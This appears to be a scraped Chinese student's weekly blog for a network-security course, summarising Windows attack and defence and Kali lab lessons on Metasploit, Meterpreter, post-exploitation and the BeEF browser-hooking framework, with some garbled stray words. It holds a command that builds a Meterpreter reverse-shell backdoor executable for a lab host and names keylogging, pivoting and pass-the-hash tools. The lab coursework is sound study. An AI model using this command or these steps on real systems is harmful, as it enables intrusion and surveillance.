第七週做業

教材第七章學習

這周我學習了教材的第七章,本章主要介紹了Windows操做系統的安全攻防。首先教材介紹了Windows操做系統的基本框架,分爲運行於處理器特權模式的操做系統內核,以及運行在處理器非特權模式的用戶空間代碼。Windows操做系統基於引用監控器模型來實現基本的對象安全模型,以安全主體概念來包含全部進行系統資源訪問請求的實體對象。Windows的受權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。接下來教材介紹了Windows的遠程安全攻防技術,包括Windows安全漏洞發現、利用與修補過程,使用Metasploit軟件實施滲透測試。針對Windows的遠程攻擊有口令猜想和破解,網絡服務滲透。而後教材介紹了Windows的本地安全攻防技術。在利用遠程滲透技術獲取呆Windows的訪問權後,攻擊者就會着力於破解本地程序漏洞,以取得系統的控制權,包括本地特權提高,敏感信息竊取,消蹤滅跡。對於遠程控制的後門程序,防護者能夠採用一些後門檢測軟件來嘗試發現攻擊者隱藏的後門程序。javascript

教材中遇到的問題及其解決

kali視頻學習

第26節 kali漏洞利用與檢索工具

1,漏洞利用工具集
看不清楚。html

第27節 kali漏洞利用之Metasploit基礎

Metasploit在滲透測試中常常被用到,實際上這套工具軟件包含了許多工具,這些工具組成一個完整的攻擊框架,他們或許在滲透測試中的每一方面都不能稱之爲最好用的工具,但組合起來的框架讓它變得更增強大。


兩個服務先啓動:

二、
路徑介紹
kali中msf的路徑爲/usr/share/metasploit-framework




三、基本命令

四、測試示例: 發現漏洞,搜索exploitjava


五、而後咱們測試它所使用的這個版本是否存在漏洞:
打開msfconsole

sql

六、設置參數以下:shell


七、設置完畢:

八、執行攻擊測試
輸入exploit進行攻擊測試,若是成功,將返回一個shell:

問題:並無返回shell。windows

第28節 kali漏洞利用之Meterpreter介紹


一、生成Meterpreter後門
輸入命令以下:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.20.222 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

二、打開MSF,開啓監聽
選擇exploit/multi/handler


三、在目標機器上運行door1.exe


還能夠實現目錄瀏覽、屏幕截圖、鍵盤監聽的功能。瀏覽器

第29節 kali漏洞利用之Metasploit後滲透測試

一、使用ifconfig查看當前網卡、網段信息。
二、添加路由表run autoroute -s 10.0.0.1
三、開Socks代理
經過使用auxiliaryver/socks4a模塊,建立一個Socks代理,能夠爲瀏覽器,Sqlmp,Namp等使用。經過代理,能夠訪問內網。
四、經過background和sessions -i能夠自由切換進入Session
五、輸入run能夠看到Meterpreter上能夠執行不少命令。
六、經過run post/能夠看到後滲透測試模塊。
七、獲取內網信息。
八、也可上傳文件,作端口轉發後續測試。安全

第30節 kali漏洞利用之beef

對XSS漏洞須要強大框架的支持,如網上的XSS平臺。在Kali下,BeeF是一個不遜色於XSS平臺的工具。Beef是瀏覽器攻擊框架的簡稱,是一款專一於瀏覽器端的滲透測試工具。
一、命令行下啓動Beef
使用beef-xss啓動,

此時瀏覽器打開頁面:http://127.0.0.1:3000/ui/authentication使用默認用戶名beef與默認密碼beef登陸。初始用戶名和密碼爲:beef和beef

左側爲目標的瀏覽器

二、假設被測試主機因爲XSS漏洞請求到 http://127.0.0.1:3000/demos/basic.html

左側online browsers出現新的選項,其Current Browser中包括瀏覽器名稱、版本、操做系統版本等。
三、HOOK持續的時間爲關閉測試頁面爲止,在此期間,至關於被控制了,能夠發送攻擊命令,在Commands模塊,咱們能夠完成不少任務:
其中,四種顏色分別表示:
該攻擊模塊可用,但隱蔽性強
該攻擊模塊可用,但隱蔽性差
該用戶模塊是否可用還有待驗證
該攻擊模塊不可用

四、選取MISC下Raw JavaScript模塊做爲測試用例
執行,查看返回結果,成功則顯示
五、代理Proxy功能
選中目標主機,點右鍵,在菜單中選中Use as Proxy;而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。
六、beef默認是不加載metasploit的,若是要使用須要作些配置。markdown

kali視頻中遇到的問題及其解決

**問題1:在進行將攻擊機的door1.exe複製粘貼到靶機sql2000上時,沒法粘貼。
解決:能夠先將應用程序複製到本地主機上,而後由此粘貼到靶機上。網絡

參考資料

《網絡攻防技術與實踐》課本教材
kali視頻26到30

第六週錯題糾正

能夠ASCII碼和16進制單字節方法Hello.java的Linux 命令:od -tcx1 Hello.java od -tc -tx1 Hello.java
Keimpx是一款 Python 編寫的哈希傳遞工具,能夠經過已有的哈希信息 GET 一個後門 SHELL
Ophcrack是一個彩虹表Windows 密碼 HASH破解工具。
傳輸層的攻擊都和TCP三次握手過程的設計缺陷有關(False)
網絡安全事件響應過程當中涉及的關鍵技術有:計算機取證;攻擊追溯與歸因;備份恢復與災難恢復。
入侵檢測中最核心的任務是信息分析,主要技術有:異常檢測和誤用檢測。其中對未知攻擊無效的是誤用檢測。
防火牆部署方式中,不能實現網絡層和應用層雙重安全的是:包過濾路由器;雙宿主堡壘主機。

本週學習總結

本週學習了Windows的攻防協議以及kali 視頻,諸多問題有出現,之後會逐步解決。

學習進度條

時間 教材學習 視頻學習 總結
第七週 第7章 第26至30個kali視頻 學習了windows操做系統安全攻防

posted on 2017-04-16 12:32 張麗呀 閱讀(...) 評論(...) 編輯 收藏

導航

統計

  • 隨筆 - 15
  • 文章 - 0
  • 評論 - 16
  • 引用 - 0
相關文章
相關標籤/搜索